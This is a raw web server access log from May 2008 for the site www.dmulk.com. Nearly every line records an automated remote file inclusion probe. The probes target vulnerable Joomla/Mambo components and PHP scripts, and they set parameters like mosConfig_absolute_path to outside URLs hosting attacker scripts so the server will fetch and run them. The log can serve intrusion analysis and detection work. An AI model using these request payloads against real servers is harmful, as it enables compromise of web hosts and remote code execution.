211.234.107.233 - - [02/May/2008:09:06:09 -0700] "GET /logs/access_080220.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.234.107.233 - - [02/May/2008:09:06:09 -0700] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.234.107.233 - - [02/May/2008:09:06:10 -0700] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.234.107.233 - - [02/May/2008:09:06:10 -0700] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.234.107.233 - - [02/May/2008:09:06:10 -0700] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.234.107.233 - - [02/May/2008:09:06:10 -0700] "GET /logs/access_080220.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.234.107.233 - - [02/May/2008:09:06:10 -0700] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.234.107.233 - - [02/May/2008:09:06:11 -0700] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.42.133.2 - - [02/May/2008:09:06:11 -0700] "GET /logs/access_080324.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.80.202.91 - - [02/May/2008:09:06:16 -0700] "GET /logs/access_080117.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.233.12.225 - - [02/May/2008:09:06:17 -0700] "GET /logs/access_080220.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.175.248.213 - - [02/May/2008:09:06:17 -0700] "GET /logs/access_080220.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.233.12.225 - - [02/May/2008:09:06:18 -0700] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.233.12.225 - - [02/May/2008:09:06:18 -0700] "GET /logs/access_080220.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.233.12.225 - - [02/May/2008:09:06:18 -0700] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.233.12.225 - - [02/May/2008:09:06:18 -0700] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.175.248.213 - - [02/May/2008:09:06:18 -0700] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.233.12.225 - - [02/May/2008:09:06:19 -0700] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.175.248.213 - - [02/May/2008:09:06:20 -0700] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.234.133.173 - - [02/May/2008:09:06:22 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
83.175.248.213 - - [02/May/2008:09:06:24 -0700] "GET /logs/access_080220.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.175.248.213 - - [02/May/2008:09:06:25 -0700] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.175.248.213 - - [02/May/2008:09:06:26 -0700] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.17.153.72 - - [02/May/2008:09:06:29 -0700] "GET //include.php?path[docroot]=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
85.17.153.72 - - [02/May/2008:09:06:30 -0700] "GET /logs//include.php?path[docroot]=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
83.175.248.213 - - [02/May/2008:09:06:33 -0700] "GET /logs/access_080220.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.175.248.213 - - [02/May/2008:09:06:34 -0700] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.156.59 - - [02/May/2008:09:06:34 -0700] "GET /logs/access_080220.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.156.59 - - [02/May/2008:09:06:34 -0700] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.175.248.213 - - [02/May/2008:09:06:34 -0700] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.156.59 - - [02/May/2008:09:06:35 -0700] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.175.248.213 - - [02/May/2008:09:06:37 -0700] "GET /logs/access_080220.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.175.248.213 - - [02/May/2008:09:06:38 -0700] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.175.248.213 - - [02/May/2008:09:06:38 -0700] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:09:06:39 -0700] "GET /logs/access_080228.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:09:06:44 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.133.2 - - [02/May/2008:09:06:46 -0700] "GET /logs/access_080117.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.234.133.173 - - [02/May/2008:09:06:47 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
89.106.244.146 - - [02/May/2008:09:06:47 -0700] "GET /logs/access_080321.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.221.79.151 - - [02/May/2008:09:06:49 -0700] "GET /logs//common/db.php?commonpath=http://www.2knowit.net/administrator/modules/id2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [02/May/2008:09:06:49 -0700] "GET //common/db.php?commonpath=http://www.2knowit.net/administrator/modules/id2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:09:06:50 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.106.244.146 - - [02/May/2008:09:06:51 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
89.106.244.146 - - [02/May/2008:09:06:52 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.61.4 - - [02/May/2008:09:06:54 -0700] "GET /logs/access_080220.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.4 - - [02/May/2008:09:06:58 -0700] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.4 - - [02/May/2008:09:06:59 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.120.27.17 - - [02/May/2008:09:07:00 -0700] "GET /logs/homepage.php?sel=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.4 - - [02/May/2008:09:07:09 -0700] "GET /logs/access_080218.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.175.248.213 - - [02/May/2008:09:07:13 -0700] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.175.248.213 - - [02/May/2008:09:07:13 -0700] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.203.209.2 - - [02/May/2008:09:07:18 -0700] "GET /logs/access_080120.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:09:07:18 -0700] "GET /logs/access_080228.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
140.120.27.17 - - [02/May/2008:09:07:18 -0700] "GET /homepage.php?sel=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.242.108.55 - - [02/May/2008:09:07:20 -0700] "GET /logs/access_080115.log//components/com_simpleboard/file_upload.php?sbp=http://perpetuallyconfused.com/games/admin/images/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:09:07:23 -0700] "GET /logs/access_080228.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:09:07:23 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:09:07:24 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:09:07:27 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:09:07:27 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
89.42.133.2 - - [02/May/2008:09:07:28 -0700] "GET /logs/access_080228.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.133.2 - - [02/May/2008:09:07:31 -0700] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
83.175.248.213 - - [02/May/2008:09:07:32 -0700] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.42.133.2 - - [02/May/2008:09:07:32 -0700] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.175.248.213 - - [02/May/2008:09:07:32 -0700] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
148.202.29.8 - - [02/May/2008:09:07:39 -0700] "GET /logs/access_080127.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.mrhard.com/templates/sbherkules/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.234.107.233 - - [02/May/2008:09:07:51 -0700] "GET /logs/access_080306.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.niceplace.biz/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.234.107.233 - - [02/May/2008:09:07:51 -0700] "GET /logs/access_080306.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://auktiontips.com/images/stories/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.234.107.233 - - [02/May/2008:09:07:55 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://auktiontips.com/images/stories/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
211.234.107.233 - - [02/May/2008:09:07:56 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.niceplace.biz/mambots/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
211.234.107.233 - - [02/May/2008:09:07:56 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://auktiontips.com/images/stories/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.234.107.233 - - [02/May/2008:09:07:57 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.niceplace.biz/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.155.232.37 - - [02/May/2008:09:07:57 -0700] "GET /logs/access_080306.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.38.19.130 - - [02/May/2008:09:08:00 -0700] "GET /logs/index.php?configFile=http://geocities.com/voice_mr/scbot.lama.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
211.233.89.217 - - [02/May/2008:09:08:02 -0700] "GET /logs/access_080220.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.233.89.217 - - [02/May/2008:09:08:02 -0700] "GET /logs/access_080220.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.155.232.37 - - [02/May/2008:09:08:02 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
211.233.89.217 - - [02/May/2008:09:08:02 -0700] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.233.89.217 - - [02/May/2008:09:08:02 -0700] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.233.89.217 - - [02/May/2008:09:08:02 -0700] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.233.89.217 - - [02/May/2008:09:08:02 -0700] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.222.128.178 - - [02/May/2008:09:08:03 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.222.128.178 - - [02/May/2008:09:08:03 -0700] "GET //ashnews.php?pathtoashnews=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.222.128.178 - - [02/May/2008:09:08:03 -0700] "GET /logs//ashnews.php?pathtoashnews=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.38.19.130 - - [02/May/2008:09:08:06 -0700] "GET /index.php?configFile=http://geocities.com/voice_mr/scbot.lama.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
195.155.232.37 - - [02/May/2008:09:08:08 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.196.43.133 - - [02/May/2008:09:08:10 -0700] "GET /logs/access_080321.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.196.43.133 - - [02/May/2008:09:08:13 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.812" "www.dmulk.com"
66.196.43.133 - - [02/May/2008:09:08:13 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
205.234.138.144 - - [02/May/2008:09:08:16 -0700] "GET /logs/access_080304.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.vspbilgisayar.com/fuckrox-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
205.234.138.144 - - [02/May/2008:09:08:16 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.vspbilgisayar.com/fuckrox-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
205.234.138.144 - - [02/May/2008:09:08:16 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.vspbilgisayar.com/fuckrox-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.42.133.2 - - [02/May/2008:09:08:28 -0700] "GET /logs/access_080226.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
198.145.244.100 - - [02/May/2008:09:08:28 -0700] "GET /logs/access_080131.log/home.php?pag=http://reitc.com/amember/data/new_rewrite/di.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
198.145.244.100 - - [02/May/2008:09:08:28 -0700] "GET /home.php?pag=http://reitc.com/amember/data/new_rewrite/di.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
198.145.244.100 - - [02/May/2008:09:08:28 -0700] "GET /logs/home.php?pag=http://reitc.com/amember/data/new_rewrite/di.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
198.145.244.100 - - [02/May/2008:09:08:29 -0700] "GET /logs/access_071230.log/home.php?pag=http://reitc.com/amember/data/new_rewrite/di.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.106.244.146 - - [02/May/2008:09:08:32 -0700] "GET /logs/access_080324.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:09:08:34 -0700] "GET /logs/access_071229.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:09:08:35 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:09:08:35 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:09:08:41 -0700] "GET /logs/access_080117.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
83.222.128.178 - - [02/May/2008:09:08:46 -0700] "GET /logs/access_080117.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.222.128.178 - - [02/May/2008:09:08:47 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
